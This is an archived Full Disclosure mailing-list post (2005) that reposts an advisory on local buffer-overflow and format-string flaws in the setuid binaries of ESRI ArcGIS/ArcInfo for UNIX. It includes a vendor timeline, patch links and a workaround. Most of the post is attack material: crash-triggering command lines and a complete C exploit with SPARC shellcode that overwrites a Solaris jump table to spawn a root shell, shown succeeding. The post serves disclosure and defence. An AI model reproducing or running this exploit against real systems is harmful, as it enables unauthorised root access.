Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
From: "KF (lists)" <kf_lists () digitalmunition com>
Date: Tue, 24 May 2005 12:50:26 -0400

Esri has posted a version 8.3 patch to their web site:

http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1020

This patch should address the problems that I outlined in version 9.x
-KF


KF (lists) wrote:


------------------------------------------------------------------------

DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
Author: Kevin Finisterre
Vendor: http://www.esri.com/, http://www.esri.com/software/arcgis/arcinfo/index.html
Product: 'ArcInfo Workstation for UNIX'
References: http://www.digitalmunition.com/DMA[2005-0425a].txt

Description: On any given day, more than 1,000,000 people around the world use ESRI's GIS to improve the way their organizations conduct business.

ESRI software is used by more than 300,000 organizations worldwide including most U.S. federal agencies and national mapping agencies, 45 of the top 50 petroleum companies, all 50 U.S. state health departments, most forestry companies, and many others in dozens of industries.

ESRI software is the standard in state and local government and is used by more than 24,000 state and local governments including Paris, France; Los Angeles, California, USA; Beijing, China; and Kuwait City, Kuwait.

ESRI ArcGIS is an integrated collection of GIS software products for building a complete GIS. ArcGIS enables users to deploy GIS functionality wherever it is needed in desktops, servers, or custom applications; over the Web; or in the field.

Several local overflows and format string conditions have been found in the Unix versions of ESRI
ArcGIS products. ESRI Staff has promptly responded to and fixed the issues mentioned below. Patches
for ArcGIS 9.x will be available at the time this advisory is published.
(http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015)

Our testing was performed against ARCInfo Workstation 9 on two of ESRI's supported UNIX platforms. We have currently only tested IRIX 6.5 and Solaris 10(beta). All UNIX ArcInfo installs are believed to be impacted by these vulnerabilities. It is currently unknown how older versions of ArcGIS are affected by these bugs. ESRI has stated that fixes for 8.x are forthcomming so I can only assume exploitation is similar for this particlar version. The vulnerable binaries can be found in <install path>/bin. The files are both setuid and setgid so they should be easily found during a routine setuid scan using the unix find utility. I was not able to exploit ALL of the binaries I found however it is likely that more vulns could be discovered.
10 setuid root binaries are provided with the install of ARCInfo
-bash-2.05b$ pwd
/export/home/arcgis/arcexe9x/bin

SunOS:
-bash-2.05b$ ls -al `find . -perm -4000 `
-rwsr-sr-x   1 root     nuucp      56772 Mar  5  2004 ./abservice
-rwsr-sr-x   1 root     nuucp    4601408 Mar  5  2004 ./arcrqmgr
-rwsr-sr-x   1 root     nuucp    2311796 Mar  5  2004 ./asbuild
-rwsr-sr-x   1 root     nuucp    2817120 Mar  5  2004 ./asmaster
-rwsr-sr-x   1 root     nuucp    7988480 Mar  5  2004 ./asrecovery
-rwsr-sr-x   1 root     nuucp    8240340 Mar  5  2004 ./asuser
-rwsr-sr-x   1 root     nuucp    2765020 Mar  5  2004 ./asutility
-rwsr-sr-x   1 root     nuucp      75904 Mar  5  2004 ./lockmgr
-rwsr-sr-x   1 root     nuucp    5652228 Mar  5  2004 ./se
-rwsr-sr-x   1 root     nuucp      81332 Mar  5  2004 ./wservice

SGI:
station0 515# ls -al `find . -perm -4000`
-rwsr-sr-x    1 root     lp           44648 Mar  9  2004 ./abservice
-rwsr-sr-x    1 root     lp         5920592 Mar  9  2004 ./arcrqmgr
-rwsr-sr-x    1 root     lp         2508552 Mar  9  2004 ./asbuild
-rwsr-sr-x    1 root     lp         3263552 Mar  9  2004 ./asmaster
-rwsr-sr-x    1 root     lp         9758516 Mar  9  2004 ./asrecovery
-rwsr-sr-x    1 root     lp        10065284 Mar  9  2004 ./asuser
-rwsr-sr-x    1 root     lp         3229812 Mar  9  2004 ./asutility
-rwsr-sr-x    1 root     lp           83260 Mar  9  2004 ./lockmgr
-rwsr-sr-x    1 root     lp         6926980 Mar  9  2004 ./se
-rwsr-sr-x    1 root     lp           83180 Mar  9  2004 ./wservice

For some reason the binaries are setgid (9). On our SunOS and IRIX boxes
this group corresponed respectively with nuucp and lp.

Some of the vulnerabilities will require a properly working license and license manager
-bash-2.05b# export LM_LICENSE_FILE=/export/home/arcgis/arcexe9x/sysgen/license.dat
-bash-2.05b# ps -ef | grep lmgr | grep -v grep
   root  1294     1   0 18:14:44 pts/3       0:00 ./lmgrd -c ./license.dat

during exploitation you may see license requests mixed in with the applciation responses.

18:27:29 (ARCGIS) IN: "ArcStormEnable" kf () ims0
18:27:29 (ARCGIS) OUT: "ArcStormEnable" kf () ims0

A cursory audit of the above listed applications revealed the following
flaws.

Both lockmgr and wservice are vulnerable to a format string attack.

-bash-2.05b$ export
ARCHOME=AAAABBBB%x.%x.%x.%x

-bash-2.05b$ ./wservice
Can not find or access
AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!

-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!

asmaster is vulnerable to a buffer overflow attack

-bash-2.05b#  ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation

-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation

asutility has multiple overflows

-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x
804'`
FATAL ERROR
Segment Violation

please note that asutility has several other overflows. Listing them all is a bit redundant.
se is subject to a buffer overflow

-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation

asrecovery is subject to a buffer overflow

-bash-2.05b# ./asrecovery  `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation

In order to show that these issues do indeed pose a security risk we have created PoC for the
format string conditions in wservice and lockmgr. This exploit was tested on the solaris platform
however exploitation on other platforms should be trivial.
-bash-2.05b$ ./ex_ARC_wservice
Can not find or access ZAAAAÿ>¢4BBBBÿ>¢67ffffc000002a0780009e39c00000615ff330c5cff330ba00000001000000001ff3033e8ff3ed86cffd
fffffff3ea9d8ffffff7fffbff4c0ff3be2bcffbff4c0ff3be2100000000000000000000000000000000000000007ff330c5
80000000100000007ff3ea9d8ff3ea1140000000010000000ff3ecc30ff3ea108ff3ea1a800c1004000000602ff3ea108000
00000ff330c580000060200c100c0ffbff618ff3cba180000000000000000000000000000000000000000000000000000000
00001b8cc0001273c000100000001b8ccff3ecbd000000002ffbff7f8ffbff7b400000000ff3ec4f800019de700000000000
100940000000000000000ff3ecbd00002a48000000020ff3b00006ffffffd000000000000000000000000000000000000001
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000900000000000000000000000000013db40000000041f7286533a121f0404919490000000041f7082825e36eb00000200
0000000a075667300000000000000000000000000000000000001179fff3ecc30ff33072800000016ff330a3c00000000000
00000ffffffffffffffffffffffffffffffffffffffffff3b000000000003ff3ea10800010034ffffffffffbff7acff3b000
043616e206e6f742066696e64206f7220616363657373205a000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000004141414100000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004
2424242¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢
@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢
@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢
@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () 
¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢@¢ () ¢
@¢ () ¢@¢@ ÊÐ?@ ËÐ!

 Ù !v#

      Ý¢`yà;¿ø# Ð  )Ð!
             Ø !n#
                  ËÜ¢chà;¿ðÀ#¿ø# À#¿ìÐ#¿è# ?"
?@ ;Рпÿß - wservice not run!
# id
uid=0(root) gid=0(root)

Workaround:
chmod -s the above mentioned setuid files or apply the patches supplyed by ESRI which can be located at http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015

This is basic timeline associated with this bug.
01/18/2005 assigned case #409658 Jeremy W takex ownership of the technical support incident
01/18/2005 Jeremy W logged this vulnerability as defect number CQ00261045
01/26/2005 Johnh exploited the a bug on solaris --/--/---- Multiple communications involving the issues at hand over a several month period 04/11/2005 Bug patches provided to KF for testing 04/27/2005 Fixes have been tested and verified
04/30/2005 Public disclosure.

As mentioned above ESRI was very prompt in addressing and fixing the issues at hand. Since the discovery of these bugs ESRI has attempted to proactively prevent future exploits from occuring.
-KF


------------------------------------------------------------------------

/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H. ** Bug found by Kevin Finisterre <kf () digitalmunition com>
** Exploit by John H. <johnh () digitalmunition com>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/


#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP                     "\xa2\x1c\x40\x11"
int             iType;


struct
{
        unsigned long retloc;
        unsigned long retaddr;
       char          *type;
}targets[] =
{

       /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
           0003a234 d thr_jmp_table
        */
        {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
        {0x41424344,0x41424344,"DEBUG"},
         },v;







//shellcode taken from netric
char shellcode[] =
"55"

NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP

// setreuid(0,0); "\x90\x1d\x80\x16" // xor %l6, %l6, %o0
        "\x92\x1d\x80\x16"    // xor  %l6, %l6, %o1
        "\x82\x10\x20\xca"    // mov  0xca, %g1
        "\x91\xd0\x20\x08"    // ta  8

        "\x90\x1d\x80\x16"      // xor          %l6, %l6, %o0
       "\x92\x1d\x80\x16"      // xor          %l6, %l6, %o1
       "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
       "\x82\x10\x20\xcb"      // mov          0x2e, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [setregid(0,0)]

       "\x21\x0b\xd9\x19"      // sethi        %hi(0x2f646400), %l0
       "\xa0\x14\x21\x76"      // or           %l0, 0x176, %l0
       "\x23\x0b\xdd\x1d"      // sethi        %hi(0x2f747400), %l1
       "\xa2\x14\x60\x79"      // or           %l1, 0x79, %l1
       "\xe0\x3b\xbf\xf8"      // std          %l0, [ %sp - 0x8 ]
       "\x90\x23\xa0\x08"      // sub          %sp, 8, %o0
       "\x92\x1b\x80\x0e"      // xor          %sp, %sp, %o1
       "\x82\x10\x20\x05"      // mov          0x05, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [open("/dev/tty",RD_ONLY)]

       "\x90\x10\x20\x02"      // mov          0x02, %o0
       "\x82\x10\x20\x29"      // mov          0x29, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [dup(2)]

       "\x21\x0b\xd8\x9a"      // sethi        %hi(0x2f626800), %l0
       "\xa0\x14\x21\x6e"      // or           %l0, 0x16e, %l0
       "\x23\x0b\xcb\xdc"      // sethi        %hi(0x2f2f7000), %l1
       "\xa2\x14\x63\x68"      // or           %l1, 0x368, %l1
       "\xe0\x3b\xbf\xf0"      // std          %l0, [ %sp - 0x10 ]
       "\xc0\x23\xbf\xf8"      // clr          [ %sp - 0x8 ]
       "\x90\x23\xa0\x10"      // sub          %sp, 0x10, %o0
       "\xc0\x23\xbf\xec"      // clr          [ %sp - 0x14 ]
       "\xd0\x23\xbf\xe8"      // st           %o0, [ %sp - 0x18 ]
       "\x92\x23\xa0\x18"      // sub          %sp, 0x18, %o1
       "\x94\x22\x80\x0a"      // sub          %o2, %o2, %o2
       "\x82\x18\x40\x01"      // xor          %g1, %g1, %g1
       "\x82\x10\x20\x3b"      // mov          0x3b, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [execve("/bin/sh","/bin/sh",NULL)]

       "\x82\x10\x20\x01"      // mov          0x01, %g1
       "\x91\xd0\x20\x08"      // ta           8                       [exit(?)]

       "\x10\xbf\xff\xdf"      // b            shellcode
       "\x90\x1d\x80\x16";     // or           %o1, %o1, %o1








/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
   *ptr++ = (char) (value >> 24) & 0xff;
   *ptr++ = (char) (value >> 16) & 0xff;
   *ptr++ = (char) (value >> 8) & 0xff;
   *ptr++ = (char) (value >> 0) & 0xff;

   return ptr;
}

/* main */
int main(int argc, char **argv)
{

   unsigned long retaddr;
   unsigned long retloc;
   int offset = 23;
   int dump_fmt=129;
   int al = 1;
   int i=0;
   int x=0;
   int c;
   unsigned long hi,lo;
   static unsigned long shift0,shift1;
   char    buf[9000];
   char    *args[24];
   char    *env[6];
   char            *ptr;
   char            padding[64];
   char            padding1[64];
   char     buf2[9000];

   if (argc < 3) {
               usage (argv[0]);
               return -1;
       }

     while((c = getopt(argc, argv, "h:t:")) != EOF) {
               switch(c) {
                       case 'h':
                               usage (argv[0]);
                               return 0;
                       case 't':
                               iType = atoi (optarg);
                               break;
                       default:
                               usage (argv[0]);
                               return 0;
               }
       }



if (argc < 2) { usage(argv[0]); exit(1); }

   if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
   {
       usage(argv[0]);
       printf("[-] Invalid type.\n");
       return 0;
}







   env[0] = shellcode;
   env[1] = buf2;
   env[2] = NULL;

   args[0] = VULPROG;
   args[1] = NULL;



retloc = targets[iType].retloc;
  retaddr = targets[iType].retaddr;



   hi = (retaddr >> 16) & 0xffff;
   lo = (retaddr >> 0) & 0xffff;

   shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
   shift1 = (0x10000 +  lo) - hi;

   memset(buf,0x00,sizeof(buf));
memset(buf2,0x00,sizeof(buf2)); ptr = buf;

    for (i = 0; i < al; i++) {
               *ptr++ = 0x41;
       }

   ptr = putLong (ptr, 0x41414141);
   ptr = putLong (ptr, retloc);
   ptr = putLong (ptr, 0x42424242);
   ptr = putLong (ptr, retloc+2);

   for (i = 0 ; i < dump_fmt; i ++) {
               memcpy(ptr, "%.8x", 4);
               ptr = ptr + 4;
    }





   strcat(ptr,"%.");
 sprintf(ptr+strlen(ptr),"%u",shift0);
  strcat(ptr,"lx%hn");

  strcat(ptr,"%.");
   sprintf(ptr+strlen(ptr),"%u",shift1);
   strcat(ptr,"lx%hn");

   strcat(buf2,"ARCHOME=");
   memcpy(buf2+strlen(buf2),buf,strlen(buf));



   execve (args[0], args, env);
   perror ("execve");
 return 0;
}

int usage(char *p)
{
   int     i;
   printf( "Arcgis local root format string exploit\r\n");
   printf( "Usage: %s <-t target>\n",p);
   for(i=0;i<sizeof(targets)/sizeof(v);i++)
   {
       printf("%d\t%s\n", i, targets[i].type);
   }
   return 0;
}

------------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • Re: DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities' KF (lists) (May 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault